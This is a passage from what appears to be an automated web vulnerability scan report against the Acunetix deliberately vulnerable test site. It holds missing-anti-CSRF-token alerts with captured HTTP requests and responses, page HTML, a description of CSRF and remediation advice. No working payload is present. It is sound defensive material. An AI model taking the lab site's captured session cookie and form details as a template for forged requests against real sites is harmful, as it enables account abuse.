          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          						<TABLE id="Table2" cellSpacing="0" cellPadding="10" width="300" border="0" class="FramedForm"
          							align="center">
          							<TR>
          								<TD>Username:</TD>
          								<TD>
          									<input name="tbUsername" type="text" id="tbUsername" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD>Password:</TD>
          								<TD>
          									<input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD></TD>
          								<TD align="right">
          									<input type="submit" name="btnSignup" value="Sign me up" id="btnSignup" /></TD>
          							</TR>
          						</TABLE>
          						<BR>
          						
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="Form1" method="post" action="Signup.aspx" id="Form1">
          Solution

          Phase: Architecture and Design

          Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        16. POST http://testaspnet.vulnweb.com/about.aspx
          Alert tags
          Alert description

          No anti-CSRF tokens were found in a submitted HTML form.

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" ].

          Request
          Request line and header section (397 bytes)
          POST http://testaspnet.vulnweb.com/about.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/about.aspx
          Content-Length: 1027
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1027 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t&__VIEWSTATEGENERATOR=E809BCA5&__EVENTVALIDATION=%2FwEWVwKqq9H0CQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2F2grLtTL%2BjO092JULZB%2B%2Bks9UGJw%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 14467
          
          
          Response body (14467 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>About</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="about.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          						<h1>About this website</h1>
          						<p>The website was built with the intention to test the Acunetix Web Vulnerability 
          							Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate 
          							the forementioned software's capabilities to find those bugs.</p>
          						<p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive 
          								information on this site. This includes e-mail addresses or real names.</b></p>
          						<h1>About Acunetix</h1>
          						<P><B>Combating the web vulnerability threat<BR>
          							</B>Securing a company's web applications is today's most overlooked aspect of 
          							securing the enterprise. Web application hacking is on the rise with as many as 
          							75% of cyber attacks done at web application level or via the web. Most 
          							corporations have secured their data at the network level, but have overlooked 
          							the crucial step of checking whether their web applications are vulnerable to 
          							attack. Web applications, which often have a direct line into the company's 
          							most valuable data assets, are online 24/7, completely unprotected by a 
          							firewall and therefore easy prey for attackers.</P>
          						<P>Acunetix was founded with this threat in mind. We realised the only way to 
          							combat web site hacking was to develop an automated tool that could help 
          							companies scan their web applications for vulnerabilities. In July 2005, 
          							Acunetix Web Vulnerability Scanner was released - a tool that crawls the 
          							website for vulnerabilities to SQL injection, cross site scripting and other 
          							web attacks before hackers do.</P>
          						<P>The Acunetix development team consists of highly experienced security developers 
          							who have each spent years developing network security scanning software prior 
          							to starting development on Acunetix WVS. The management team is backed by years 
          							of experience marketing and selling security software.</P>
          						<P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/">
          								offices</A> in Malta, US and the UK.
          						</P>
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="Form1" method="post" action="about.aspx" id="Form1">
          Solution

          Phase: Architecture and Design

          Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        17. POST http://testaspnet.vulnweb.com/default.aspx
          Alert tags
          Alert description

          No anti-CSRF tokens were found in a submitted HTML form.

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" ].

          Request
          Request line and header section (388 bytes)
          POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com
          Content-Length: 1025
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1025 bytes)
